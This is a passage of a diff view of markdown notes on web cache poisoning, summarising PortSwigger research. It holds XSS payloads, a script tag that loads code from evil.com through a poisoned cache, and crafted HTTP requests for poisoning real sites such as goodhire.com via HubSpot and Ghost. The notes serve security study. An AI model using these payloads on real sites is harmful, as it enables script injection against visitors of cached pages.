<img href="https://a.\"><script>alert(1)</script>a.png" />
|
<img href="https://a.\"><script>alert(1)</script>a.png" />
|
||||||
```
|
```
|
||||||
|
|
||||||
2. Seizing the Cache
|
2. Seizing the Cache
|
||||||
```
|
```
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
@ -45,6 +47,7 @@ Cache-Control: public, max-age=1800
|
|||||||
<script src="https://evil.com/x.js">
|
<script src="https://evil.com/x.js">
|
||||||
</script>
|
</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
3. Selective poisoning
|
3. Selective poisoning
|
||||||
```
|
```
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
@ -60,6 +63,7 @@ Vary: User-Agent, Accept-Encoding
|
|||||||
…
|
…
|
||||||
<link rel="canonical" href="https://a">a<iframe onload=alert(1)>
|
<link rel="canonical" href="https://a">a<iframe onload=alert(1)>
|
||||||
```
|
```
|
||||||
|
|
||||||
4. Chaining Unkeyed Inputs
|
4. Chaining Unkeyed Inputs
|
||||||
- First step
|
- First step
|
||||||
```
|
```
|
||||||
@ -110,9 +114,7 @@ CF-Cache-Status: MISS
|
|||||||
<title>HubSpot - Page not found</title>
|
<title>HubSpot - Page not found</title>
|
||||||
<p>The domain canary does not exist in our system.</p>
|
<p>The domain canary does not exist in our system.</p>
|
||||||
```
|
```
|
||||||
To exploit this, we
|
To exploit this, we need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and then finally trick HubSpot into serving this response on goodhire.com
|
||||||
need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and
|
|
||||||
then finally trick HubSpot into serving this response on goodhire.com
|
|
||||||
```
|
```
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: www.goodhire.com
|
Host: www.goodhire.com
|
||||||
@ -136,9 +138,7 @@ The response is
|
|||||||
HTTP/1.1 302 Found
|
HTTP/1.1 302 Found
|
||||||
Location: https://ghost.org/fail/
|
Location: https://ghost.org/fail/
|
||||||
```
|
```
|
||||||
When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a
|
When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has defined a custom domain, their ghost.io subdomain will simply redirect to it:
|
||||||
blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has
|
|
||||||
defined a custom domain, their ghost.io subdomain will simply redirect to it:
|
|
||||||
```
|
```
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: blog.cloudflare.com
|
Host: blog.cloudflare.com
|
||||||
@ -150,5 +150,5 @@ HTTP/1.1 302 Found
|
|||||||
Location: http://noshandnibble.blog/
|
Location: http://noshandnibble.blog/
|
||||||
```
|
```
|
||||||
|
|
||||||
Reference:
|
## References
|
||||||
- [Portswigger](https://portswigger.net/research/practical-web-cache-poisoning)
|
* [Portswigger](https://portswigger.net/research/practical-web-cache-poisoning)
|
Loading…
Reference in New Issue
Block a user